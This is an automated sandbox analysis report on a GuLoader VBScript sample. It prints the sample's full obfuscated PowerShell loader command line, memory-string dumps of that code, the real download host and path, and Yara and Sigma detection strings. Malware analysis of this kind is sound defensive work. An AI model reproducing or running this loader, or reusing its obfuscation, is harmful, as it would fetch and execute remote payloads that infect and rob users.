
Windows Analysis Report
IMG-35235235523525235252532535Selvfinansieret.vbs

Overview

General Information

Sample name: IMG-35235235523525235252532535Selvfinansieret.vbs
Analysis ID: 1448280
MD5: a6cf7a17bac5acfed8b42dae16767f8e
SHA1: 2f9499cee74dfb887b549c5766c4f5dfec9743e0
SHA256: 412da635eb16946ae92c0648efe4f687771f3625eedeacd3f2889862ed492658
Tags: vbs
Infos:

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 2548 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-35235235523525235252532535Selvfinansieret.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 2664 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Megampere='Sub';$Megampere+='strin';$Sensualistiske = 1;$Megampere+='g';Function Skdefrakker($Gyldigt){$Doors=$Gyldigt.Length-$Sensualistiske;For($Papirtigerne=5;$Papirtigerne -lt $Doors;$Papirtigerne+=6){$Reoxygenize+=$Gyldigt.$Megampere.Invoke( $Papirtigerne, $Sensualistiske);}$Reoxygenize;}function Hadaway($Awiggle){ & ($Feeblenesses) ($Awiggle);}$Allitterationernes=Skdefrakker ' InveMUnstaozithazFort.i .ontlAcro.lWo riaOffen/,odel5Snf,e. Svir0Apag. Medle(F aktWAlureiAngwin Salpd fortoAkti wFo,eosDeval ,latfNgrozaT Midt Teleg1Sa.pe0Di,se.bedir0Franc; Toxi Non.WSlur iDerkrnmaner6Qui.q4 Tids; Spaa DiffxAde,o6Non.q4Bedri;fogus Skivr,lommvSlagl:incom1Sti l2 Cy,t1Pundu.Paran0Still),asto LadeGSangueunp,rc ,ithkRoop oPreco/,enom2Besva0Covis1 Inno0Pudsi0Harpe1 B.mp0In,an1Chait GotthFPrikkiSlfanrDrapfeHy,stfPeakioB.gcaxNoi.e/Sanit1Van b2furil1Klept.Augus0Cente ';$Unresponsible=Skdefrakker 'I.ddaUGrappsElbapeHovedrInten-AdskiA Rel.gAgerbeUns,rnFluort In,k ';$Gualaca=Skdefrakker 'SowabhSubtotFedtetAnsatpElizas Forr: uci/Fakul/ ChrorE.togaRecormBenzoiBlundrMozegeCentaxKo le.Grun r LogfoFo,dl/Sli euSchatn,nterp AerorRespoiFnugln MinicLogiciUnderpAquarl.iiiseT.ividR.gti.SketcsVir.eeTr usapaala ';$sacrum=Skdefrakker 'Llers>Frugt ';$Feeblenesses=Skdefrakker 'BulimiRemaie vi.txBryll ';$Lophiostomous='Westfilms';$Opkrsler250 = Skdefrakker ' Lo he TralcUdholh JagtoFreda Brune%Se.weaBrne,pD.iftpChokpdV.lutaOptrktStendaSangu%Slumm\ or dDStandsAbette ,nken S lgerorsc.AramiKopponnU,dereHarmo in,on& A zo&Ko ku Va,deOverpcUnde.hSco,ooSkopu DeputFeday ';Hadaway (Skdefrakker ' Fors$V lgrgRkeb lSherroStophbOverfaBisexllustr:Mumb.REksemaHaremdStilbiOvereoOtosaa DublcToneatMac.si Out.vSamboePiloc=Prism(DishwcLoo emChiqudblake Ant,t/.gnencSdigh Faste$ GemsOStatsp ugebkDublirPreens paralExceseDimenrInco.2ind.a5Klas,0T,ana)M,rkw ');Hadaway (Skdefrakker 'Exfig$ Afmag 
EstolRekogoPropubPlopsaOrloglBange:.eglvDDoorkeCel irGourmvMa,kei GasosPolith Anthl At miNonphkrenuleRekto= Sl.m$CorslG Lillu SteraT.ykplAgraraAdrescBartea Tran.Wo ris.ontop GrealAx.nei Par.tStjfl( Peri$mutins Al,uaStalic ,ytirE.trauBreakmConci)Unmov ');$Gualaca=$Dervishlike[0];$Mayaca= (Skdefrakker 'Com,r$ IntrgO.erllTra hoSdva b,kohoaU,dullSortk: Kon.W Iba.a No puadvanbgerodeN.areeTilbunHexac2S.der0Tima 5Dan e=PuttiNForgje Intew Sm d-H.smaO JunkbTorpej HomoeF rticMisceteurok H,roiSPantiyNabonsAntebtWakaseGrif,mHeste.obtruNop,ege ScrutAngri.R.chrWfr kee BldsbRearrCNondelselekiBolige,radan Cognt');$Mayaca+=$Radioactive[1];Hadaway ($Mayaca);Hadaway (Skdefrakker 'Nytte$Opka WEle,eaStblouUdtr,b Klone Cla,eproctnGasbo2tilhy0Echin5Neuro.Gli,sHSup re uninaBoligdFremfeMisjorFingesDater[Bankv$hi,liU SnounleggirAcroteGr,ndsFond.p,rodeoHovednCrosssMichei gobebShuddlWodeleMaa e]Guill=Vanfu$PenneA ki slante lInteriFictit Uri,tpred.e Drkir,oamba OutwtHauboiVehemoArmo n Ge be Semir Moden Wofue clersU,der ');$Anandrarious=Skdefrakker 'Sp.li$AdjurW oadwaStod.u EgenbHjerneDyreheBrkrenSuper2Letma0.endr5Abumb.AlfabD SubooTilstwColl.nStrawlDartsoDatafaK,atodCountFA,kfoiTeks l amleVa ge(fas i$ SociGB,achuSalt.aUndsilKldebaMargic FuldaOrigi,Liste$PensiSDecorkTraady vampgSkolegAccene enfamCar io ssenrCo ioeHorselvarios D st)Alfab ';$Skyggemorels=$Radioactive[0];Hadaway (Skdefrakker 'Grupp$BortcgHy nalLoud.oFrigobrinseaAntirle ide: Jikus Baccl Hindi SanigSer ehSpunctMiljtiTa honFare,eLeis.s kseksEks,r=O,ele(Ind,tTPyro e Car,s .vint Sens-Re.eiPBiquiaPeri.tUnskeh Bela Folke$CygniS OverkBind yInscrgHewetg loodeBrobumCh,onoMisi.rEarp.eLil.elLystrsMercu)Appet ');while (!$slightiness) {Hadaway (Skdefrakker 'Samme$Gim,egMonosl R,nkoBedwebBe.enaInds,lSalvi:,etalaLittegPropegV ilir.astraOpremnSago.d Fa,tiprovizstatsa.uficbRvep lCyphoe .qui=Dri t$Pheret,iennrHik,tu ,espeOpret ') ;Hadaway $Anandrarious;Hadaway (Skdefrakker 'UdbulSUngagtAalega eth.rUndertSerpe-XvidoS.picll Vek.etordeeAmmunpF rma 
L,rsp4 Plan ');Hadaway (Skdefrakker ' Alla$IndbegSudbul avedotum,ib Propa The.lSamme:TitlesFra elLam.diFemalgg.nerhP radt ,ubai StennT,peleParassSpeeds Bico=Sadel(,ejtrT assieenergsFolketM hit-Am,lyPTrolla .onit EpidhFremm W lac$Gis eS TastkDataby s,migRec.pg esteCoed,mForlioPhantrUnbodeKlasslWarrasSva g)Int,r ') ;Hadaway (Skdefrakker 'Do.su$ DemegAfprvl Pro.o overbSekt a Baktl onsa:FemaaERibromEulyta P,durSukkegSpretiPreconUl.ona Is ttTriadeSickl=Hilly$Cinctg Sk.slNylonoInfekbBrugeaRedi.l Morp:metapgPotameOutfinTeirenVugg e KoncmPolyga t,burMuttebGalope Gra.jPerfodBundeeSalpilHypofsDige.eDis asBilag+Afsnr+Na bo%Afvig$ ivaD Sv.geVarsor.onsivDdniniNotaesut lih Verbl.runkiAld,rksignaeUnder. LimiclyskooIldneuFotognHydrot Appe ') ;$Gualaca=$Dervishlike[$Emarginate];}$Romantikers=288577;$Gabions=28318;Hadaway (Skdefrakker '.ksem$PastogBarmflEltr oAppelbU guiablundl Cr,m:CarduT ysteeMicroeIn,bum Garas Seto Parro= Cell AlkohGPens eConcet alle- TravCOptimoRug mnBrnd.tTppebeSammenmanertBrand Filic$WhitiSDi.idkSjakay Suspg,nimagBlueseOxla.mRe,eroApo.hrUnowneAnalylVedersHexad ');Hadaway (Skdefrakker 'Reawa$medvigAmneslUnsluo raksbForena,astblVicep:DiachCOversoHamardUndsleJern v P.coeB,oodlVegetoUnderpCoun.eBtteprChroms.epro Retha=Sup r Geusi[T rkiS AdelyCatabsAtmoctGgemmeBumblm Mil,.bl,odCProkuoMervrnF.siov.onpreFors rW opstBayre] unsp:Septi:KeirsF PercrOno aoTeak.mviru,B CiviaSolifs aarseLibe,6 .log4FreshSDemeatRavnerKajakisnowmn UdspgAmtsf(Ca.bu$ hydrTSongheforneeKnaphm,ovedsE.der)Jeete ');Hadaway (Skdefrakker 'Sekte$Impalg sa.ulBreadoFin,rbKodnia benzlVrik.: UnheGOxygesSinuot MillgMoiseiavnervkalasePrunkrSljfe Selv=Strm Grug[SaulqS andaySpejls To.ot SkoleTedesm Fnu . 
cardToutjueCalvixQasidtz,chi..eninEGennen NattcIntrooUdmaadVove,iAnvennMed.cgommbl] D.ss:Sneb,:Alb,rAFlustSA,owrC A.stIU.jetI diff.fodboGE,ilaeWeapotElec STyr,etbudstr BridiChappn Hel,gTol a(Abuli$ KarrCOktroo RededGrouneAfsnrvHjerteEarp l B leo ,oelp Ket.e Da arDivagsEmiel)Reall ');Hadaway (Skdefrakker 'opha,$Ce teg SkomlPlanloSka db StulahouselJeani: MateAPolionSids tH llwi Windn S iniVerd,hFecu,iPeartlTechniAnstdsPalm mS ici=Remin$Bed dG Ma,nsAc,tetBadesgNondeiLarynv MormePack.rAegir.Hive.s ConjuUdvikbKvad s silktantisrFodsaiUnprenGenregMiner( Dupl$ S.iaR Unhooskat.mmultiabetorn.hagotJunkii Lovmk A.kveK.rsfrAz ots Pseu,Gloss$TidskGsk.ldaHedesbMagtai OldkosanctnAd ecsDe.it) Op,u ');Hadaway $Antinihilism;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5492 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dsene.Kne && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source: 00000002.00000002.2204611926.0000023E10072000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_GuLoader_5; Description: Yara detected GuLoader; Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 2664; Rule: JoeSecurity_PowershellDownloadAndExecute; Description: Yara detected Powershell download and execute; Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 2664; Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC; Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen; Strings:
      • 0x2e1438:$b2: ::FromBase64String(
      • 0x329701:$b2: ::FromBase64String(
      • 0x32973d:$b2: ::FromBase64String(
      • 0x32977a:$b2: ::FromBase64String(
      • 0x3297b8:$b2: ::FromBase64String(
      • 0x3297f7:$b2: ::FromBase64String(
      • 0x329837:$b2: ::FromBase64String(
      • 0x329878:$b2: ::FromBase64String(
      • 0x3298ba:$b2: ::FromBase64String(
      • 0x15e03:$s1: -join
      • 0x22ed8:$s1: -join
      • 0x262aa:$s1: -join
      • 0x2695c:$s1: -join
      • 0x2844d:$s1: -join
      • 0x2a653:$s1: -join
      • 0x2ae7a:$s1: -join
      • 0x2b6ea:$s1: -join
      • 0x2be25:$s1: -join
      • 0x2be57:$s1: -join
      • 0x2be9f:$s1: -join
      • 0x2bebe:$s1: -join
Source: amsi64_2664.amsi.csv; Rule: JoeSecurity_PowershellDownloadAndExecute; Description: Yara detected Powershell download and execute; Author: Joe Security
Source: amsi64_2664.amsi.csv; Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC; Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen; Strings:
        • 0xe0f2:$b2: ::FromBase64String(
        • 0xd121:$s1: -join
        • 0x68cd:$s4: +=
        • 0x698f:$s4: +=
        • 0xabb6:$s4: +=
        • 0xccd3:$s4: +=
        • 0xcfbd:$s4: +=
        • 0xd103:$s4: +=
        • 0xf5aa:$s4: +=
        • 0xf62a:$s4: +=
        • 0xf6f0:$s4: +=
        • 0xf770:$s4: +=
        • 0xf946:$s4: +=
        • 0xf9ca:$s4: +=
        • 0xd8f8:$e4: Get-WmiObject
        • 0xdae7:$e4: Get-Process
        • 0xdb3f:$e4: Start-Process

        System Summary

Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-35235235523525235252532535Selvfinansieret.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-35235235523525235252532535Selvfinansieret.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-35235235523525235252532535Selvfinansieret.vbs", ProcessId: 2548, ProcessName: wscript.exe
Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-35235235523525235252532535Selvfinansieret.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-35235235523525235252532535Selvfinansieret.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-35235235523525235252532535Selvfinansieret.vbs", ProcessId: 2548, ProcessName: wscript.exe
        No Snort rule has matched


        AV Detection

Source: http://pesterbdd.com/images/Pester.png; URL Reputation: Label: malware
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 92.3% probability
Source: unknown; HTTPS traffic detected: 188.215.50.15:443 -> 192.168.2.6:49699 version: TLS 1.2
        Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.2237631693.0000023E75FEE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2237168004.0000023E75E4A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb[j source: powershell.exe, 00000002.00000002.2237168004.0000023E75E4A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb3 source: powershell.exe, 00000002.00000002.2237631693.0000023E75FEE000.00000004.00000020.00020000.00000000.sdmp

        Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe; Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic; HTTP traffic detected: GET /unprincipled.sea HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: ramirex.ro | Connection: Keep-Alive
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; HTTP traffic detected: GET /unprincipled.sea HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: ramirex.ro | Connection: Keep-Alive
Source: global traffic; DNS traffic detected: DNS query: ramirex.ro
Source: powershell.exe, 00000002.00000002.2237631693.0000023E75FEE000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.m
Source: powershell.exe, 00000002.00000002.2204611926.0000023E10072000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2185875177.0000023E00228000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2185875177.0000023E01DAF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://ramirex.ro
Source: powershell.exe, 00000002.00000002.2185875177.0000023E00001000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2185875177.0000023E00228000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2185875177.0000023E00001000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.2204611926.0000023E10072000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2204611926.0000023E10072000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2204611926.0000023E10072000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2185875177.0000023E00228000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2185875177.0000023E01373000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.2204611926.0000023E10072000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.2185875177.0000023E00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2185875177.0000023E018BC000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ramirex.ro
Source: powershell.exe, 00000002.00000002.2185875177.0000023E00228000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ramirex.ro/unprincipled.seaP
Source: unknown; Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown; HTTPS traffic detected: 188.215.50.15:443 -> 192.168.2.6:49699 version: TLS 1.2

        System Summary

Source: amsi64_2664.amsi.csv, type: OTHER; Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2664, type: MEMORYSTR; Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
Source: C:\Windows\System32\wscript.exe; Process created: Commandline size = 6351
Source: C:\Windows\System32\wscript.exe; COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 2_2_00007FFD348A60D0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 2_2_00007FFD348A4231
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 2_2_00007FFD348A3BFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 2_2_00007FFD348A73D3
Source: IMG-35235235523525235252532535Selvfinansieret.vbs; Initial sample: Strings found which are bigger than 50
Source: amsi64_2664.amsi.csv, type: OTHER; Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2664, type: MEMORYSTR; Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: wscript.exe, 00000000.00000003.2067669341.000001B9DBDC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p ugebkDublirPreens paralExceseDimenrInco.2ind.a5Klas,0T,ana)M,rkw ');Hadaway (Skdefrakker 'Exfig$ Afmag EstolRekogoPropubPlopsaOrloglBange:.eglvDDoorkeCel irGourmvMa,kei GasosPolith Anthl At miNonphkrenuleRekto= Sl.m$CorslG Lillu SteraT.ykplAgraraAdrescBartea Tran.Wo ris.ontop GrealAx.nei Par.tStjfl( Peri$mutins Al,uaStalic ,ytirE.trauBreakmConci)Unmov ');$Gualaca=$Dervishlike[0];$Mayaca= (Skdefrakker 'Com,r$ IntrgO.erllTra hoSdva b,kohoaU,dullSortk: Kon.W Iba.a No puadvanbgerodeN.areeTilbunHexac2S.der0Tima 5Dan e=PuttiNForgje Intew Sm d-H.smaO JunkbTorpej HomoeF rticMisceteurok H,roiSPantiyNabonsAntebtWakaseGrif,mHeste.obtruNop,ege ScrutAngri.R.chrWfr kee BldsbRearrCNondelselekiBolige,radan Cognt');$Mayaca+=$Radioactive[1];Hadaway ($Mayaca);Hadaway (Skdefrakker 'Nytte$Opka WEle,eaStblouUdtr,b Klone Cla,eproctnGasbo2tilhy0Echin5Neuro.Gli,sHSup re uninaBoligdFremfeMisjorFingesDater[Bankv$hi,liU SnounleggirAcroteGr,ndsFond.p,rodeoHovednCrosssMichei gobebShuddlWodeleMaa e]Guill=Vanfu$PenneA ki slante lInteriFictit Uri,tpred.e Drkir,oamba OutwtHauboiVehemoArmo n Ge be Semir Moden Wofue clersU,der ');$Anandrarious=Skdefrakker 'Sp.li$AdjurW oadwaStod.u EgenbHjerneDyreheBrkrenSuper2Letma0.endr5Abumb.AlfabD SubooTilstwColl.nStrawlDartsoDatafaK,atodCountFA,kfoiTeks l amleVa ge(fas i$ SociGB,achuSalt.aUndsilKldebaMargic FuldaOrigi,Liste$PensiSDecorkTraady vampgSkolegAccene enfamCar io ssenrCo ioeHorselvarios D st)Alfab ';$Skyggemorels=$Radioactive[0];Hadaway (Skdefrakker 'Grupp$BortcgHy nalLoud.oFrigobrinseaAntirle ide: Jikus Baccl Hindi SanigSer ehSpunctMiljtiTa honFare,eLeis.s kseksEks,r=O,ele(Ind,tTPyro e Car,s .vint Sens-Re.eiPBiquiaPeri.tUnskeh Bela Folke$CygniS OverkBind yInscrgHewetg loodeBrobumCh,onoMisi.rEarp.eLil.elLystrsMercu)Appet ');while (!$slightiness) {Hadaway (Skdefrakker 'Samme$Gim,egMonosl 
R,nkoBedwebBe.enaInds,lSalvi:,etalaLittegPropegV ilir.astraOpremnSago.d Fa,tiprovizstatsa.uficbRvep lCyphoe .qui=Dri t$Pheret,iennrHik,tu ,espeOpret ') ;Hadaway $Anandrarious;Hadaway (Skdefrakker 'UdbulSUngagtAalega eth.rUndertSerpe-XvidoS.picll Vek.etordeeAmmunpF rma L,rsp4 Plan ');Hadaway (Skdefrakker ' Alla$IndbegSudbul avedotum,ib Propa The.lSamme:TitlesFra elLam.diFemalgg.nerhP radt ,ubai StennT,peleParassSpeeds Bico=Sadel(,ejtrT assieenergsFolketM hit-Am,lyPTrolla .onit EpidhFremm W lac$Gis eS TastkDataby s,migRec.pg esteCoed,mForlioPhantrUnbodeKlasslWarrasSva g)Int,r ') ;Hadaway (Skdefrakker 'Do.su$ DemegAfprvl Pro.o overbSekt a Baktl onsa:FemaaERibromEulyta P,durSukkegSpretiPreconUl.ona Is ttTriadeSickl=Hilly$Cinctg Sk.slNylonoInfekbBrugeaRedi.l Morp:metapgPotameOutfinTeirenVugg e KoncmPolyga t,burMuttebGalope Gra.jPerfodBundeeSalpilHypofsDige.eDis asBilag+Afsnr+Na bo%Afvig$ ivaD Sv.geVarsor.onsivDdniniNotaesut lih Verbl.runkiAld,rksignaeUnder. LimiclyskooIldneuFotognHydrot Appe ') ;$Gualaca=$Dervishlike[$Emarginate];}$Romantikers=288577;$Gabions=28318;Hadaway (Skdefrakker '.ksem$PastogBarmflEltr oAppelbU guiablundl Cr,m:CarduT ysteeMicroeI
        Source: wscript.exe, 00000000.00000003.2067950301.000001B9DBD95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065521032.000001B9DDC15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065617903.000001B9DDC15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065880121.000001B9DDC15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065571506.000001B9DDC15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065772832.000001B9DDC15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065828358.000001B9DDC15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2068422793.000001B9DDC15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2068311646.000001B9DBD9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065723435.000001B9DDC15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065310773.000001B9DDC13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: T0 = T0 & ".slNy"
        Source: wscript.exe, 00000000.00000003.2064845193.000001B9DDBF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .slNyP2
        Source: wscript.exe, 00000000.00000003.2067900943.000001B9DBDCA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o ku Va,deOverpcUnde.hSco,ooSkopu DeputFeday ';Hadaway (Skdefrakker ' Fors$V lgrgRkeb lSherroStophbOverfaBisexllustr:Mumb.REksemaHaremdStilbiOvereoOtosaa DublcToneatMac.si Out.vSamboePiloc=Prism(DishwcLoo emChiqudblake Ant,t/.gnencSdigh Faste$ GemsOStatsp ugebkDublirPreens paralExceseDimenrInco.2ind.a5Klas,0T,ana)M,rkw ');Hadaway (Skdefrakker 'Exfig$ Afmag EstolRekogoPropubPlopsaOrloglBange:.eglvDDoorkeCel irGourmvMa,kei GasosPolith Anthl At miNonphkrenuleRekto= Sl.m$CorslG Lillu SteraT.ykplAgraraAdrescBartea Tran.Wo ris.ontop GrealAx.nei Par.tStjfl( Peri$mutins Al,uaStalic ,ytirE.trauBreakmConci)Unmov ');$Gualaca=$Dervishlike[0];$Mayaca= (Skdefrakker 'Com,r$ IntrgO.erllTra hoSdva b,kohoaU,dullSortk: Kon.W Iba.a No puadvanbgerodeN.areeTilbunHexac2S.der0Tima 5Dan e=PuttiNForgje Intew Sm d-H.smaO JunkbTorpej HomoeF rticMisceteurok H,roiSPantiyNabonsAntebtWakaseGrif,mHeste.obtruNop,ege ScrutAngri.R.chrWfr kee BldsbRearrCNondelselekiBolige,radan Cognt');$Mayaca+=$Radioactive[1];Hadaway ($Mayaca);Hadaway (Skdefrakker 'Nytte$Opka WEle,eaStblouUdtr,b Klone Cla,eproctnGasbo2tilhy0Echin5Neuro.Gli,sHSup re uninaBoligdFremfeMisjorFingesDater[Bankv$hi,liU SnounleggirAcroteGr,ndsFond.p,rodeoHovednCrosssMichei gobebShuddlWodeleMaa e]Guill=Vanfu$PenneA ki slante lInteriFictit Uri,tpred.e Drkir,oamba OutwtHauboiVehemoArmo n Ge be Semir Moden Wofue clersU,der ');$Anandrarious=Skdefrakker 'Sp.li$AdjurW oadwaStod.u EgenbHjerneDyreheBrkrenSuper2Letma0.endr5Abumb.AlfabD SubooTilstwColl.nStrawlDartsoDatafaK,atodCountFA,kfoiTeks l amleVa ge(fas i$ SociGB,achuSalt.aUndsilKldebaMargic FuldaOrigi,Liste$PensiSDecorkTraady vampgSkolegAccene enfamCar io ssenrCo ioeHorselvarios D st)Alfab ';$Skyggemorels=$Radioactive[0];Hadaway (Skdefrakker 'Grupp$BortcgHy nalLoud.oFrigobrinseaAntirle ide: Jikus Baccl Hindi SanigSer ehSpunctMiljtiTa honFare,eLeis.s 
